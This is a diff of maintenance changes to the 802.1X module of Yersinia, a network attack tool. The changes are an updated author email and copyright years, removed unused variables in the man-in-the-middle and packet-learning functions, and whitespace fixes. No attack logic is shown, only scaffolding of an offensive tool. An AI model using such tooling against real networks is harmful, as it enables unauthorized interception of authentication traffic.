@@ -2,8 +2,8 @@
  * Implementation and attacks for IEEE 802.1X
  *
  * Yersinia
- * By David Barroso <tomac@yersinia.net> and Alfredo Andres <slay@yersinia.net>
- * Copyright 2005, 2006, 2007 Alfredo Andres and David Barroso
+ * By David Barroso <tomac@yersinia.net> and Alfredo Andres <aandreswork@hotmail.com>
+ * Copyright 2005-2017 Alfredo Andres and David Barroso
  *
  * This program is free software; you can redistribute it and/or
  * modify it under the terms of the GNU General Public License
@@ -20,16 +20,13 @@
  * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */
 
-#ifndef lint
-static const char rcsid[] = 
-       "$Id :$";
-#endif
-
 #ifdef HAVE_CONFIG_H
 #include <config.h>
 #endif
 
+#ifndef _REENTRANT
 #define _REENTRANT
+#endif
 
 #include <stdio.h>
 #include <errno.h>
@@ -326,7 +323,6 @@ dot1x_th_mitm(void *arg)
     struct attacks *attacks=NULL;
     struct attack_param *param;
     sigset_t mask;
-    struct dot1x_data *dot1x_data;
     struct pcap_pkthdr header;
     struct libnet_802_3_hdr *ether;
     struct timeval now;
@@ -349,8 +345,6 @@ dot1x_th_mitm(void *arg)
        dot1x_th_mitm_exit(attacks);
     }
 
-    dot1x_data = attacks->data;
-
     param = attacks->params;
 
     p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_AUTH].value);
@@ -549,7 +543,6 @@ dot1x_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *d
     struct dot1x_data *dot1x_data;
     struct pcap_data pcap_aux;
     u_int8_t *packet, got_802_1x_pkt = 0;
-    u_int16_t *cursor;
     dlist_t *p;
     struct interface_data *iface_data;
     
@@ -577,8 +570,6 @@ dot1x_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *d
             return -1;
         }
 
-        cursor = (u_int16_t *)(packet + 12);
-
         pcap_aux.header = header;
         pcap_aux.packet = packet;
                                                                                           
@@ -680,8 +671,8 @@ dot1x_get_printable_packet(struct pcap_data *data)
        return NULL;
 
     if ((field_values = (char **) protocol_create_printable(protocols[PROTO_DOT1X].nparams, protocols[PROTO_DOT1X].parameters)) == NULL) {
-	    write_log(0, "Error in calloc\n");
-	    return NULL;
+        write_log(0, "Error in calloc\n");
+        return NULL;
     }
 
     ether = (struct libnet_802_3_hdr *) data->packet;
@@ -759,9 +750,9 @@ dot1x_get_printable_store(struct term_node *node)
 
     /* Source MAC */
     snprintf(field_values[DOT1X_SMAC], 18, "%02X:%02X:%02X:%02X:%02X:%02X",
-	    dot1x_tmp->mac_source[0], dot1x_tmp->mac_source[1],
-	    dot1x_tmp->mac_source[2], dot1x_tmp->mac_source[3],
-	    dot1x_tmp->mac_source[4], dot1x_tmp->mac_source[5]);
+        dot1x_tmp->mac_source[0], dot1x_tmp->mac_source[1],
+        dot1x_tmp->mac_source[2], dot1x_tmp->mac_source[3],
+        dot1x_tmp->mac_source[4], dot1x_tmp->mac_source[5]);
 
     /* Destination MAC */
     snprintf(field_values[DOT1X_DMAC], 18, "%02X:%02X:%02X:%02X:%02X:%02X",
